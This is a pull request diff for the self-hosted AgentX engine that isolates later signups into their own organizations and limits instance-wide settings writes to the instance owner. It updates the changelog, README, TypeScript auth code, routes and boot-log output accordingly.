### PR TITLE
Per-signup workspaces, and two docs that stopped being true

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -830,3 +830,68 @@ that runs `bun build --compile` and `scripts/smoke-binary.sh` against the result
 and a read back over bun:sqlite, a malformed timestamp, a clean SIGTERM, and an assertion that dev
 mode does not write to `/`. Checked both ways: it passes on the fixed binary and fails on the
 pre-fix one with `dev mode wrote the dashboard bundle to the filesystem root`.
+
+`AGENTX_AUTH=enabled` turned out to have login without tenancy. Every signup after the first was
+inserted into the first user's organization as a member, and `GET /projects` returns each project's
+raw API key so the switcher can populate itself - so the second person to sign up on a shared
+instance received working credentials for the first person's traces, datasets, evaluations and
+prompts. Nothing was misrouted at the storage layer: every domain is properly scoped by
+`db.projectId` and always was. The leak was entirely in who is allowed to *list* projects, which is
+also where keys are handed out. The suite had the behaviour pinned as correct
+(`joins a later signup to the same organization as a member`), which is why it survived.
+
+`AGENTX_TENANCY` now decides what a second signup means, and defaults to `isolated`: its own
+organization, its own starter project, no view of anyone else's. `shared` restores the old
+single-organization team server for operators who actually want it. The first signup is unchanged in
+both modes - it becomes an owner and claims every orgless project, which is what keeps enabling auth
+on a populated instance from stranding its data. Existing rows are untouched on upgrade; only new
+signups follow the setting, so an instance relying on the old behaviour sets `AGENTX_TENANCY=shared`.
+
+The starter project matters more than it looks: an organization that owns nothing has no API key,
+and the key is the only data-plane credential, so an isolated signup without one lands on a dashboard
+it cannot use. It is seeded exactly the way `POST /projects` seeds (system evaluators, metric packs)
+rather than approximately.
+
+Isolation then exposed a second-order problem the schema comments had already flagged as
+"revisit if that turns out wrong in practice": two tables are deliberately instance-wide, and both
+are written by routes that authenticate with a *project key*, not a session. Any tenant could
+therefore rewrite the shared provider keys every other tenant's judges spend against, and - the
+sharper one - rewrite a `portability_models` row's `baseUrl`, which Model Portability replays
+captured trace input against, redirecting another tenant's prompts to an endpoint of the writer's
+choosing. Writes to both are now `instanceOwnerOnly`; reads stay open, and already masked every
+stored key. The instance owner is derived rather than stored: it is the organization that owns the
+default project, which is the one row the first signup is guaranteed to have claimed, so there is no
+second source of truth and no migration.
+
+`POST /projects` also stopped picking `orgs[0]` out of an unordered membership query - the
+better-auth organization plugin lets a user create further organizations, so that would scatter
+their projects across them. It now takes the signup organization (oldest membership, ownership as
+tiebreak).
+
+The boot banner stopped printing a key when auth is enabled. It printed the default project's key
+unconditionally, which is right for the zero-setup local mode and wrong the moment the instance is
+shared: `docker logs`, a pod log or a log shipper would hand anyone who can read it a working
+data-plane credential for the instance owner's project. Disabled mode is unchanged - that printed
+key is what makes the local flow work - and `test/server.ts` already documented the enabled-mode
+behaviour as "prints no key", which had simply never been true.
+
+Verified against the real engine: a second signup gets a project list that shares neither an id nor
+a key with the first's, cannot see the first's ingested trace through its own key, and is refused
+(403) on both instance-wide write surfaces while the owner is allowed and the catalog row is checked
+afterwards to confirm nothing moved. A separate engine boots with `AGENTX_TENANCY=shared` and pins
+the opposite result, since the two modes differ only in what the second signup means and that is
+exactly the branch that rots once the default stops exercising it. 444 passed on SQLite; the
+Postgres-gated suites need `AGENTX_TEST_DB_URL` and were not run locally, so the isolated path -
+which writes more per signup than the shared one - has a Postgres case added for CI to run.
+
+Then the same thing again through the actual dashboard, because the fix is worthless if a second
+person cannot reach a sign-up form: three engines booted (isolated, shared, disabled) and driven
+over HTTP for 34 checks, then a browser against a real instance where the owner already existed.
+The visitor gets the Sign in / Create account screen, creates an account, and lands on a working
+dashboard with its own seeded starter project (7 patterns, 1 online evaluator) and its own key in
+Platform Settings; the owner's project list does not grow; clicking Clear on the instance-wide
+OpenAI key as the non-owner leaves it configured. Two strings in the dashboard bundle are now stale
+and belong to AgentX-web-front, not here: the sign-up screen still says "New accounts join this
+instance's organization as members", and the API-key panel still says self-host "has no multi-tenant
+boundary this key protects". `GET /api/v1/auth/config` now carries `tenancy` so the first of those
+can be fixed by reading it rather than by picking a different hardcoded sentence.

--- a/README.md
+++ b/README.md
@@ -20,6 +20,7 @@ browser, and prints a local API key for the SDK. Prefer a container? See [Docker
 - [Features](#features)
 - [Docker](#docker)
 - [Configuration](#configuration)
+- [Multi-user setup](#setting-up-a-multi-user-instance)
 - [SDK & OpenTelemetry](#sdk--opentelemetry)
 - [What's in this repo](#whats-in-this-repo)
 - [Building from source](#building-from-source)
@@ -120,6 +121,7 @@ Set these in the environment before starting `agentx-server`:
 | `AGENTX_IMPROVEMENT_SWEEP` | `true` | Set to `false` to disable the background sweep that auto-generates and validates improvement proposals when failure evidence crosses a threshold (the Improvement Inbox). `POST /evaluate/improve/inbox/sweep/run` still triggers one manually. |
 | `AGENTX_SESSION_SWEEP` | `true` | Set to `false` to disable the background sweep that judges idle multi-turn sessions (session-scoped Online Evaluators). `POST /agent-monitoring/session-sweep/run` still triggers one manually. |
 | `AGENTX_AUTH` | `disabled` | Set to `enabled` to require dashboard sign-in (see "Dashboard authentication" below). The default keeps the zero-setup local posture. |
+| `AGENTX_TENANCY` | `isolated` | What a *second* signup gets when `AGENTX_AUTH=enabled`. `isolated`: its own organization and its own starter project, invisible to everyone else. `shared`: it joins the first user's organization and sees its projects (the team-server posture). Ignored when auth is disabled. |
 | `AGENTX_AUTH_SECRET` | (auto-generated) | Session-signing secret for `AGENTX_AUTH=enabled`. Generated and persisted on first enabled boot if unset; set explicitly when running multiple replicas. |
 | `AGENTX_PUBLIC_URL` | - | The externally reachable base URL when running behind a proxy/domain with auth enabled (used for auth callbacks/cookies). |
 | `AGENTX_TRUSTED_ORIGINS` | - | Comma-separated extra origins allowed to make authenticated browser requests (e.g. a dev dashboard on another port). |
@@ -136,14 +138,111 @@ one operator), and the dashboard bootstraps its API key automatically. That stay
 hosting the dashboard on the internet):
 
 - The first visit shows an owner-setup screen. The first account created becomes the owner of a
-  default organization and takes over every existing project on the instance. Later signups join
-  that organization as members.
+  default organization and takes over every existing project on the instance - so enabling auth on
+  an install that already has data hands that data to whoever runs setup, not to whoever signs up
+  second.
 - Signing in is what grants the dashboard its project list (and each project's API key); the
   unauthenticated bootstrap endpoint is disabled in this mode.
 - SDK ingest is unchanged in both modes: it authenticates with project API keys, never sessions.
   Enabling or disabling auth never breaks a deployed integration.
 - Identity is standard [better-auth](https://better-auth.com) (email/password out of the box),
   stored in the same database as everything else - works on both SQLite and Postgres.
+
+#### Setting up a multi-user instance
+
+Four things to decide, then one boot. Only the first is required.
+
+| | Why |
+| --- | --- |
+| `AGENTX_AUTH=enabled` | Required. Turns on sign-in. Without it the engine hands its API key to anyone who can reach the port. |
+| `AGENTX_TENANCY` | `isolated` (default) gives every signup its own workspace; `shared` puts everyone in one. See [below](#who-sees-what-agentx_tenancy). |
+| `AGENTX_AUTH_SECRET` | Auto-generated and persisted on first boot. Set it explicitly if you run more than one replica, or sessions issued by one are rejected by the next. Any 32+ random bytes: `openssl rand -hex 32`. |
+| `AGENTX_PUBLIC_URL` | The URL people actually type, when that is not `http://localhost:4700` - behind a proxy or a domain, auth cookies and callbacks need it. |
+
+**Docker**
+
+```bash
+docker run -d -p 4700:4700 -v agentx-data:/data \
+  -e AGENTX_AUTH=enabled \
+  -e AGENTX_AUTH_SECRET="$(openssl rand -hex 32)" \
+  -e AGENTX_PUBLIC_URL=https://agentx.example.com \
+  -e OPENAI_API_KEY=sk-... \
+  agentx-selfhost
+```
+
+**Binary**
+
+```bash
+AGENTX_AUTH=enabled AGENTX_PUBLIC_URL=https://agentx.example.com agentx-server
+```
+
+**Kubernetes** - the keys are already in [`k8s/configmap.yaml`](k8s/configmap.yaml); flip
+`AGENTX_AUTH` to `"enabled"` and move `AGENTX_AUTH_SECRET` into a Secret rather than the ConfigMap.
+
+Then, in the browser:
+
+1. **Open the dashboard and create the first account.** The first visit shows an owner-setup
+   screen rather than a login form. This account becomes the **instance owner**: it owns the
+   pre-existing `Default` project, and - under isolated tenancy - it is the only account that can
+   change the instance-wide provider keys and pricing catalog. Create it yourself, before handing
+   the URL out; whoever fills this screen in gets the instance.
+2. **Set the provider keys** under Platform Settings (or pass them as env vars above). Judge
+   scoring and semantic pattern detection need them; trace ingest and phrase/regex patterns do not.
+3. **Hand out the URL.** Everyone else signs up through the same screen, which now offers *Sign in*
+   and *Create account*. Under the default isolated tenancy each new account lands in its own
+   workspace with its own starter project, and sees nothing of anyone else's.
+4. **Each person points their SDK at their own project key**, copied from Platform Settings (or
+   the project switcher) once signed in:
+
+   ```bash
+   export AGENTX_API_BASE_URL=https://agentx.example.com/api/v1
+   export AGENTX_API_KEY=agtx_local_...   # this user's own project, not the boot-log key
+   ```
+
+   With auth enabled the boot log prints no API key at all - not even the instance owner's. Keys
+   only ever come from the dashboard, to the signed-in user they belong to. (Auth-disabled mode
+   still prints the `Default` project's key, which is what makes the zero-setup local flow work.)
+
+To verify isolation on your own instance: sign up a second throwaway account and confirm its
+project list has nothing in common with the first's.
+
+Nothing about the SDK changes between auth modes - ingest authenticates with a project API key and
+never does a login flow, so turning auth on does not break an already-deployed integration.
+
+#### Who sees what: `AGENTX_TENANCY`
+
+Everything a project owns - traces, agents, datasets, evaluations, prompts, patterns - is scoped to
+that project, and a project's API key is what selects it. So the only question that decides
+isolation is which projects a signed-in user can *list*, because the project list carries each
+project's key.
+
+**`AGENTX_TENANCY=isolated` (the default)** - every signup gets its own organization and its own
+starter project. Users cannot see, or obtain a key for, anyone else's projects. This is what to run
+for a hosted deployment, or a self-host instance several people sign up on independently.
+
+**`AGENTX_TENANCY=shared`** - every signup joins the first user's organization and shares its
+projects. Choose this deliberately for a team server whose members are meant to see the same data.
+
+Two things stay instance-wide in both modes, because one machine has one of each: the provider keys
+in Platform Settings (what judge scoring spends against) and the Model Portability pricing catalog.
+Everyone can read them - the keys only ever as a masked value - but with isolated tenancy only the
+instance owner's own projects can write them. The instance owner is the organization that claimed
+the default project on first signup.
+
+`GET /api/v1/auth/config` reports the active mode (`{ mode, needsSetup, tenancy }` when auth is
+enabled), so the sign-up screen can say truthfully what a new account gets.
+
+Roles (`owner`/`member`) exist on organization membership and govern the organization surface.
+Inside an organization they are not a permission boundary: any member of an organization can use
+any of its projects, which is the point of `shared`. Isolation between *tenants* is the
+organization, not the role.
+
+#### Upgrading an instance that already ran with auth enabled
+
+Existing users, organizations, and projects are untouched - nobody loses access to anything. Only
+signups from this version onward follow `AGENTX_TENANCY`, so an instance that was relying on the old
+"everyone lands in one organization" behaviour should set `AGENTX_TENANCY=shared` explicitly to keep
+new teammates joining the existing organization.
 
 ## SDK & OpenTelemetry
 

--- a/README.md
+++ b/README.md
@@ -254,6 +254,18 @@ export AGENTX_API_BASE_URL=http://localhost:4700/api/v1
 export AGENTX_API_KEY=<printed by agentx-server on first run>
 ```
 
+Trace, Evaluate and Monitor all answer here, including the parts with no hosted equivalent yet:
+`client.evaluations.prompts`, `client.monitor.online_evaluators`, `client.outcomes`,
+`client.feedback`, and the CI gate (`run.gate(...)`).
+
+The SDK is written against the hosted API, though, so a few of its calls have no route here and
+404: `client.evaluations.list_models()`, `client.tracer.evaluate_trace()`, and the CI-run surface
+behind `client.tracer.run_eval()` (`create_ci_run`, `submit_result`, `finalize_ci_run`,
+`get_ci_run`, `get_dataset_test_cases`). Gate a self-host CI job with
+`run.gate(fail_under=..., no_regression=True)` instead - that path is fully supported. The hosted
+platform surface (`client.get_agent()`, `list_workforces()`, conversations) is out of scope here
+entirely.
+
 **OpenTelemetry** - Trace also accepts real OTLP/HTTP traces directly, no AgentX SDK required:
 
 ```bash
@@ -437,7 +449,9 @@ end-user feedback).
   fundamentally tied to AgentX's native agent config-branching system, which self-host doesn't
   have. The version-comparison and Prompt Registry features are the self-host analogs.
 - Guardrail hasn't been started.
-- Evaluate's async whole-run analysis (`analyze_run`/`get_report`) is out of scope for now.
+- Evaluate's whole-run analysis (`analyze_run`/`get_report`) works, but runs synchronously where
+  hosted AgentX queues a durable job: `analyze` returns only once the judges are done, and the
+  SDK's poll loop sees a terminal status on its first check. Long runs hold the request open.
 
 See [CHANGELOG.md](CHANGELOG.md) for the detailed, narrative build/verification history behind
 every feature above.

--- a/engine/src/auth/betterAuth.ts
+++ b/engine/src/auth/betterAuth.ts
@@ -6,7 +6,10 @@ import { drizzleAdapter } from "better-auth/adapters/drizzle";
 import { organization } from "better-auth/plugins";
 import { fromNodeHeaders } from "better-auth/node";
 import type { Request } from "express";
-import type { Db } from "../storage/db.js";
+import { withProjectId, type Db } from "../storage/db.js";
+import { createProject, getDefaultProject, getProjectRow } from "../core/project/projects.js";
+import { ensureSessionBaselineJudge } from "../core/monitor/builtinEvaluators.js";
+import { ensureMetricPackConfigs } from "../core/evaluate/metricPack.js";
 
 // Dashboard identity for AGENTX_AUTH=enabled mode (cloud, or a team self-host): better-auth with
 // email/password, cookie sessions, and the organization plugin, persisted through this engine's
@@ -24,52 +27,127 @@ export function authMode(): AuthMode {
   return process.env.AGENTX_AUTH === "enabled" ? "enabled" : "disabled";
 }
 
+// What a *second* signup means on the same instance - the one decision that separates "a team
+// server" from "a place several unrelated people happen to share", and the reason the original
+// enabled-mode implementation leaked: it only ever had the team answer.
+//
+//   isolated (default): every signup gets its own organization and its own starter project.
+//     Nobody sees, or can obtain a key for, anybody else's projects - which is what both cloud
+//     and a self-host instance that strangers can sign up on need.
+//   shared: every signup joins the first user's organization as a member, sharing its projects.
+//     The small-team server posture (the previous, and now opt-in, behaviour).
+//
+// Deliberately independent of AGENTX_AUTH so the two questions stay separate: AGENTX_AUTH decides
+// whether there are users at all, AGENTX_TENANCY decides what a user owns. Meaningless (and
+// ignored) in disabled mode, which has no users to isolate.
+export type TenancyMode = "isolated" | "shared";
+
+export function tenancyMode(): TenancyMode {
+  return process.env.AGENTX_TENANCY?.trim().toLowerCase() === "shared" ? "shared" : "isolated";
+}
+
 // Typed off the concrete builder below (the generic Auth<BetterAuthOptions> and the inferred
 // instance type aren't mutually assignable in better-auth's typings).
 let authInstance: BetterAuthInstance | null = null;
 let authDb: Db | null = null;
 
-// First-user-becomes-owner (the Grafana/n8n/Portainer pattern): the first signup creates the
-// default organization, becomes its owner, and CLAIMS every orgless project - including the
-// default project an existing install migrated in with, so enabling auth on a populated instance
-// hands its data to the person who runs the setup screen, not to whoever signs up second. Later
-// signups join that same org as plain members (the single-org self-host model; cloud can layer
-// org-per-signup on top later).
-async function onUserCreated(db: Db, userId: string): Promise<void> {
-  const now = new Date();
-  const anyMember =
+type NewUser = { id: string; name?: string | null; email?: string | null };
+
+async function anyMemberRow(db: Db): Promise<{ organizationId: string } | undefined> {
+  const row =
     db.kind === "sqlite"
       ? db.db.select().from(db.schema.authMembers).limit(1).all()[0]
       : (await db.db.select().from(db.schema.authMembers).limit(1))[0];
+  return row as { organizationId: string } | undefined;
+}
 
-  if (!anyMember) {
-    const orgId = nanoid();
-    const orgRow = { id: orgId, name: "Default Organization", slug: "default", logo: null, createdAt: now, metadata: null };
-    const memberRow = { id: nanoid(), organizationId: orgId, userId, role: "owner", createdAt: now };
-    if (db.kind === "sqlite") {
-      await db.db.insert(db.schema.authOrganizations).values(orgRow);
-      await db.db.insert(db.schema.authMembers).values(memberRow);
-      await db.db
-        .update(db.schema.projects)
-        .set({ organizationId: orgId })
-        .where(isNull(db.schema.projects.organizationId));
-    } else {
-      await db.db.insert(db.schema.authOrganizations).values(orgRow);
-      await db.db.insert(db.schema.authMembers).values(memberRow);
-      await db.db
-        .update(db.schema.projects)
-        .set({ organizationId: orgId })
-        .where(isNull(db.schema.projects.organizationId));
-    }
-    return;
+async function insertOrganization(db: Db, org: { id: string; name: string; slug: string }, now: Date): Promise<void> {
+  const orgRow = { id: org.id, name: org.name, slug: org.slug, logo: null, createdAt: now, metadata: null };
+  if (db.kind === "sqlite") {
+    await db.db.insert(db.schema.authOrganizations).values(orgRow);
+  } else {
+    await db.db.insert(db.schema.authOrganizations).values(orgRow);
   }
+}
 
-  const memberRow = { id: nanoid(), organizationId: anyMember.organizationId as string, userId, role: "member", createdAt: now };
+async function insertMember(db: Db, organizationId: string, userId: string, role: string, now: Date): Promise<void> {
+  const memberRow = { id: nanoid(), organizationId, userId, role, createdAt: now };
   if (db.kind === "sqlite") {
     await db.db.insert(db.schema.authMembers).values(memberRow);
   } else {
     await db.db.insert(db.schema.authMembers).values(memberRow);
   }
+}
+
+// Everything on the instance that no organization owns yet, handed to the first signup - see
+// onUserCreated's comment for why that is the first user rather than nobody.
+async function claimOrphanProjects(db: Db, organizationId: string): Promise<void> {
+  if (db.kind === "sqlite") {
+    await db.db
+      .update(db.schema.projects)
+      .set({ organizationId })
+      .where(isNull(db.schema.projects.organizationId));
+  } else {
+    await db.db
+      .update(db.schema.projects)
+      .set({ organizationId })
+      .where(isNull(db.schema.projects.organizationId));
+  }
+}
+
+// A brand-new organization owns nothing, and a project is the only thing that carries an API key -
+// so without this an isolated-tenancy signup lands on an empty dashboard with no credential and no
+// obvious next step. Seeded exactly like POST /projects does (system evaluators + metric packs),
+// because a project that skipped those behaves subtly differently from every other one.
+async function createStarterProject(db: Db, organizationId: string): Promise<void> {
+  const project = await createProject(db, "Default", organizationId);
+  await ensureSessionBaselineJudge(withProjectId(db, project._id));
+  await ensureMetricPackConfigs(withProjectId(db, project._id));
+}
+
+function organizationNameFor(user: NewUser): string {
+  const label = user.name?.trim() || user.email?.trim().split("@")[0] || "";
+  return label ? `${label}'s Organization` : "Organization";
+}
+
+// Who owns what, at the one moment it is decided. Two rules, in this order:
+//
+// 1. The FIRST signup always becomes an owner and CLAIMS every orgless project - including the
+//    default project an existing install migrated in with. That is what makes enabling auth on a
+//    populated instance hand its data to the person who runs the setup screen rather than
+//    stranding it (or handing it to whoever signs up second). True in both tenancy modes.
+// 2. Every LATER signup depends on tenancyMode():
+//    - isolated (default): its own organization, as owner, with its own starter project. It can
+//      never see or obtain a key for anything the first user owns.
+//    - shared: joins the first user's organization as a member, and sees its projects. The old
+//      behaviour, now something an operator opts into rather than the only option.
+//
+// Note that rule 1 is deliberately not "the first user owns the instance forever": it only decides
+// the pre-existing rows. In isolated mode the first user's org keeps exactly one extra power over
+// later ones - it owns the default project, which is what marks it as the instance operator for
+// instance-wide settings (see instanceOwnerOrganizationId below).
+async function onUserCreated(db: Db, user: NewUser): Promise<void> {
+  const now = new Date();
+  const existingMember = await anyMemberRow(db);
+
+  if (!existingMember) {
+    const orgId = nanoid();
+    await insertOrganization(db, { id: orgId, name: "Default Organization", slug: "default" }, now);
+    await insertMember(db, orgId, user.id, "owner", now);
+    await claimOrphanProjects(db, orgId);
+    return;
+  }
+
+  if (tenancyMode() === "shared") {
+    await insertMember(db, existingMember.organizationId, user.id, "member", now);
+    return;
+  }
+
+  const orgId = nanoid();
+  // Slug is UNIQUE across the table, so it cannot be derived from a name two people can both pick.
+  await insertOrganization(db, { id: orgId, name: organizationNameFor(user), slug: `org-${orgId}` }, now);
+  await insertMember(db, orgId, user.id, "owner", now);
+  await createStarterProject(db, orgId);
 }
 
 type InitAuthOpts = { secret: string; baseURL?: string; trustedOrigins?: string[] };
@@ -109,7 +187,7 @@ function buildAuth(db: Db, opts: InitAuthOpts) {
       user: {
         create: {
           after: async user => {
-            await onUserCreated(db, user.id);
+            await onUserCreated(db, user);
           },
         },
       },
@@ -161,6 +239,52 @@ export async function getUserOrganizationIds(userId: string): Promise<string[]> 
       ? db.db.select().from(db.schema.authMembers).where(cond).all()
       : await db.db.select().from(db.schema.authMembers).where(cond);
   return (rows as { organizationId: string }[]).map(r => r.organizationId);
+}
+
+// Which organization a signed-in user's NEW projects belong to. Deterministic on purpose: the
+// better-auth organization plugin lets a user create further organizations of their own, so
+// "whichever membership row the database happened to return first" would quietly scatter their
+// projects across them. The signup organization wins - the oldest membership, which is the one
+// onUserCreated made - with ownership as the tiebreak.
+export async function getPrimaryOrganizationId(userId: string): Promise<string | null> {
+  const db = authDb;
+  if (!db) return null;
+  const cond = eq(db.schema.authMembers.userId, userId);
+  const rows =
+    db.kind === "sqlite"
+      ? db.db.select().from(db.schema.authMembers).where(cond).all()
+      : await db.db.select().from(db.schema.authMembers).where(cond);
+  const memberships = (rows as { organizationId: string; role: string; createdAt: Date }[]).slice().sort((a, b) => {
+    const byAge = new Date(a.createdAt).getTime() - new Date(b.createdAt).getTime();
+    if (byAge !== 0) return byAge;
+    return Number(b.role === "owner") - Number(a.role === "owner");
+  });
+  return memberships[0]?.organizationId ?? null;
+}
+
+// The organization that owns the instance's default project - i.e. whoever ran the setup screen
+// first. Deliberately derived rather than stored on a new column: the default project is already
+// the one row the first signup is guaranteed to claim (claimOrphanProjects above), so there is no
+// second source of truth to keep in sync and an install that predates this code needs no migration
+// to acquire one.
+export async function instanceOwnerOrganizationId(db: Db): Promise<string | null> {
+  const project = await getDefaultProject(db);
+  return project?.organizationId ?? null;
+}
+
+// Instance-wide settings (app_settings' provider keys) are a single row every tenant on the box
+// shares, and the route that writes them authenticates with a PROJECT key rather than a session -
+// so with isolated tenancy any signup could otherwise swap the credential every other tenant's
+// judges spend money on. Writes are therefore limited to the instance operator's own projects;
+// everyone else keeps the masked read. Always allowed when auth is off (single tenant by
+// definition), in shared tenancy (one org owns every project anyway), and before the first signup
+// has claimed anything - there is nothing to protect yet.
+export async function canWriteInstanceSettings(db: Db, projectId: string): Promise<boolean> {
+  if (authMode() !== "enabled") return true;
+  const ownerOrganizationId = await instanceOwnerOrganizationId(db);
+  if (!ownerOrganizationId) return true;
+  const project = await getProjectRow(db, projectId);
+  return project?.organizationId === ownerOrganizationId;
 }
 
 // True while no user exists yet - drives the frontend's owner-setup screen vs login screen.

--- a/engine/src/index.ts
+++ b/engine/src/index.ts
@@ -175,6 +175,14 @@ async function main() {
     console.log(`Dashboard sign-in is required (AGENTX_AUTH=enabled) - open the dashboard to create the first account.`);
     console.log(`Each user copies their own project's API key from the dashboard; none is printed here.`);
   } else {
+    // Yes, a credential in the log - deliberately, and only on this branch. Auth-disabled mode is
+    // single-tenant local use, where the README already says anyone who can reach the port gets
+    // this key. This banner is the ONLY place a fresh caller learns it (/api/v1/dev/bootstrap is
+    // gone), and README's `docker logs | grep "API key"`, scripts/smoke-test.sh,
+    // scripts/smoke-binary.sh and test/server.ts all read it from here. AGENTX_AUTH=enabled - the
+    // mode where a logged credential would actually matter - prints none, see the branch above.
+    // A CodeQL "clear-text logging" autofix that drops it takes CI and the documented onboarding
+    // with it; dismiss the alert instead.
     const defaultProject = await getDefaultProject(getDb());
     console.log(`Default project API key: ${defaultProject?.apiKey}`);
     console.log(`Point the SDK here with:`);

--- a/engine/src/index.ts
+++ b/engine/src/index.ts
@@ -166,12 +166,21 @@ async function main() {
   // unref'd interval, so it never blocks shutdown. AGENTX_SESSION_SWEEP=false disables.
   startSessionSweep();
   startImprovementSweep();
-  const defaultProject = await getDefaultProject(getDb());
   console.log(`AgentX self-host engine listening on http://localhost:${PORT}`);
-  console.log(`Default project API key: ${defaultProject?.apiKey}`);
-  console.log(`Point the SDK here with:`);
-  console.log(`  AGENTX_API_BASE_URL=http://localhost:${PORT}/api/v1`);
-  console.log(`  AGENTX_API_KEY=${defaultProject?.apiKey}`);
+  if (authMode() === "enabled") {
+    // No key in the banner in this mode. Everyone signs in and copies their OWN project's key from
+    // the dashboard, and on a shared instance the log is not a private channel - anyone with
+    // `docker logs`, a kubectl pod log, or a log aggregator would otherwise be holding a working
+    // data-plane credential for the instance owner's project.
+    console.log(`Dashboard sign-in is required (AGENTX_AUTH=enabled) - open the dashboard to create the first account.`);
+    console.log(`Each user copies their own project's API key from the dashboard; none is printed here.`);
+  } else {
+    const defaultProject = await getDefaultProject(getDb());
+    console.log(`Default project API key: ${defaultProject?.apiKey}`);
+    console.log(`Point the SDK here with:`);
+    console.log(`  AGENTX_API_BASE_URL=http://localhost:${PORT}/api/v1`);
+    console.log(`  AGENTX_API_KEY=${defaultProject?.apiKey}`);
+  }
   // Printed in both modes, not just dev: web/ isn't committed, so a source checkout started with
   // `yarn start` (no --dev, hence no auto-download) serves the API fine and 404s every non-API
   // GET. Without this the only symptom is a bare "Cannot GET /" in the browser and nothing at all

--- a/engine/src/routes/agentMonitoringDashboard.ts
+++ b/engine/src/routes/agentMonitoringDashboard.ts
@@ -1,4 +1,4 @@
-import type { Request, Response } from "express";
+import type { NextFunction, Request, Response } from "express";
 import { asyncRouter } from "./asyncRouter.js";
 import { getDb, type Db } from "../storage/db.js";
 import { scopedDb } from "../auth/apiKey.js";
@@ -69,6 +69,7 @@ import {
   testCustomModelConnection,
 } from "../core/evaluate/models.js";
 import { getAppSettings, updateAppSettings } from "../core/settings/appSettings.js";
+import { canWriteInstanceSettings } from "../auth/betterAuth.js";
 import {
   getProject,
   regenerateProjectApiKey,
@@ -926,6 +927,21 @@ agentMonitoringDashboardRouter.post("/estimate", async (req: Request, res: Respo
   res.status(200).json({ action: req.body?.action, estimatedCredits: 0 });
 });
 
+// Instance-wide rows - the shared model catalog below and the shared provider keys further down -
+// sit outside any project's scope, so with AGENTX_TENANCY=isolated a valid project key alone is not
+// enough to WRITE them: see betterAuth.ts's canWriteInstanceSettings for the reasoning. The sharp
+// edge is a catalog row's baseUrl, which Model Portability replays trace input against - rewriting
+// one would redirect another tenant's captured prompts to an endpoint of the writer's choosing.
+// Reads stay open in both cases: shared reference pricing is the point, and the wire shapes already
+// mask every stored key. A no-op outside AGENTX_AUTH=enabled, and in shared tenancy.
+const instanceOwnerOnly = async (req: Request, res: Response, next: NextFunction) => {
+  if (await canWriteInstanceSettings(getDb(), req.projectId!)) {
+    next();
+    return;
+  }
+  res.status(403).json({ error: "Instance-wide settings are managed by the instance owner" });
+};
+
 // Model portability (core/evaluate/portability.ts) - an input-only replay of a captured trace
 // against alternative models, not a full agent re-run (self-host doesn't own the agent). Explicit,
 // per-trace, user-triggered only: never runs automatically, and nothing about the *comparison
@@ -945,7 +961,7 @@ agentMonitoringDashboardRouter.get("/portability/models/unpriced", async (req: R
 
 const VALID_PROVIDERS = ["openai", "anthropic", "gemini", "custom"];
 
-agentMonitoringDashboardRouter.post("/portability/models", async (req: Request, res: Response) => {
+agentMonitoringDashboardRouter.post("/portability/models", instanceOwnerOnly, async (req: Request, res: Response) => {
   const body = req.body ?? {};
   if (typeof body.id !== "string" || !body.id.trim()) {
     res.status(400).json({ error: "id is required (the exact model string sent to the provider's API)" });
@@ -987,7 +1003,7 @@ agentMonitoringDashboardRouter.post("/portability/models", async (req: Request, 
   res.status(201).json({ model });
 });
 
-agentMonitoringDashboardRouter.put("/portability/models/:id", async (req: Request, res: Response) => {
+agentMonitoringDashboardRouter.put("/portability/models/:id", instanceOwnerOnly, async (req: Request, res: Response) => {
   const body = req.body ?? {};
   if (!VALID_PROVIDERS.includes(body.provider)) {
     res.status(400).json({ error: 'provider must be "openai", "anthropic", "gemini", or "custom"' });
@@ -1025,7 +1041,7 @@ agentMonitoringDashboardRouter.put("/portability/models/:id", async (req: Reques
   res.status(200).json({ model });
 });
 
-agentMonitoringDashboardRouter.delete("/portability/models/:id", async (req: Request, res: Response) => {
+agentMonitoringDashboardRouter.delete("/portability/models/:id", instanceOwnerOnly, async (req: Request, res: Response) => {
   const deleted = await deletePortabilityModel(scopedDb(req), req.params.id!);
   if (!deleted) {
     res.status(404).json({ error: "Model not found" });
@@ -1111,7 +1127,9 @@ agentMonitoringDashboardRouter.put("/settings/monitoring-defaults", async (req: 
   res.status(200).json({ monitoringDefaults });
 });
 
-agentMonitoringDashboardRouter.put("/settings/llm-keys", async (req: Request, res: Response) => {
+// instanceOwnerOnly: these credentials are one row the whole instance spends against, so an
+// isolated tenant holding its own valid project key still must not be able to swap them out.
+agentMonitoringDashboardRouter.put("/settings/llm-keys", instanceOwnerOnly, async (req: Request, res: Response) => {
   const body = req.body ?? {};
   const patch: { openaiApiKey?: string | null; anthropicApiKey?: string | null; geminiApiKey?: string | null } = {};
   if ("openaiApiKey" in body) {

--- a/engine/src/routes/apiV1.ts
+++ b/engine/src/routes/apiV1.ts
@@ -25,9 +25,11 @@ import { finishMcpAuth } from "../core/evaluate/mcp.js";
 import {
   authMode,
   getAuth,
+  getPrimaryOrganizationId,
   getSessionUser,
   getUserOrganizationIds,
   needsSetup,
+  tenancyMode,
 } from "../auth/betterAuth.js";
 
 export type ApiV1Deps = {
@@ -50,6 +52,10 @@ export function registerAuthRoutes(app: Express, credentialLimit: RequestHandler
     res.status(200).json({
       mode,
       needsSetup: mode === "enabled" ? await needsSetup(getDb()) : false,
+      // Only in enabled mode, where it means something: it is what the sign-up screen needs to say
+      // truthfully what a new account gets - its own workspace, or membership of the existing one.
+      // Disabled mode's response shape is left byte-identical.
+      ...(mode === "enabled" ? { tenancy: tenancyMode() } : {}),
       ...(defaultProject ? { apiKey: defaultProject.apiKey } : {}),
     });
   }));
@@ -91,12 +97,11 @@ export function registerApiV1(app: Express, deps: ApiV1Deps): void {
         res.status(401).json({ error: "Sign in to create a project" });
         return;
       }
-      const orgs = await getUserOrganizationIds(user.id);
-      if (orgs.length === 0) {
+      organizationId = await getPrimaryOrganizationId(user.id);
+      if (!organizationId) {
         res.status(403).json({ error: "No organization membership" });
         return;
       }
-      organizationId = orgs[0] ?? null;
     }
     const body = req.body ?? {};
     if (typeof body.name !== "string" || !body.name.trim()) {

--- a/engine/src/test/auth.integration.test.ts
+++ b/engine/src/test/auth.integration.test.ts
@@ -15,20 +15,22 @@ const json = (body: unknown): RequestInit => ({
   headers: { "content-type": "application/json" },
 });
 
+const put = (body: unknown): RequestInit => ({ ...json(body), method: "PUT" });
+
 /** better-auth hands back its session in a Set-Cookie; this replays it like a browser would. */
 function cookieHeader(res: Response): string {
   const raw = res.headers.getSetCookie?.() ?? [];
   return raw.map(c => c.split(";")[0]).join("; ");
 }
 
